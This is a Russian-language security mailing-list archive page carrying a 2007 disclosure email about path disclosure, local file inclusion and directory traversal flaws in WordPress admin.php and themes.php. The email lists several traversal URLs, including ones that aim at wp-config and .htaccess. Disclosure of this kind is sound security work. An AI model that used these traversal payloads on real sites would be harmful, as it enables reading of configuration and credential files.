Информационная безопасность
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  [Full-disclosure] NoseRub Login SQL Injection Vulnerability

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:29 декабря 2007 г.
Subject:Local file include, Directory traversal and Full path disclosure in WordPress

Здравствуйте 3APA3A!

Сообщаю вам о найденной мною Local file include, Directory traversal и Full path disclosure уязвимостях в WordPress. Дыры в файлах admin.php (параметр import) и themes.php (параметр page).

Full path disclosure:

http://site/wp-admin/admin.php?import=\..\..\wp-config

http://site/wp-admin/themes.php?page=

Данные скрипты уязвимы к атаке с использованием обратного слеша (что работает только на Windows).

Local file include и Directory traversal:

http://site/wp-admin/admin.php?import=\..\..\file

http://site/wp-admin/themes.php?page=\..\..\file.php

http://site/wp-admin/themes.php?page=\..\..\.htaccess

В файле admin.php через параметр import можно лишь подключить файлы с php расширением.

Уязвимы версии WordPress <= 2.0.11 и потенциально последующие версии (2.1.x, 2.2.x та 2.3.x).

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1679/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 
 



Rating@Mail.ru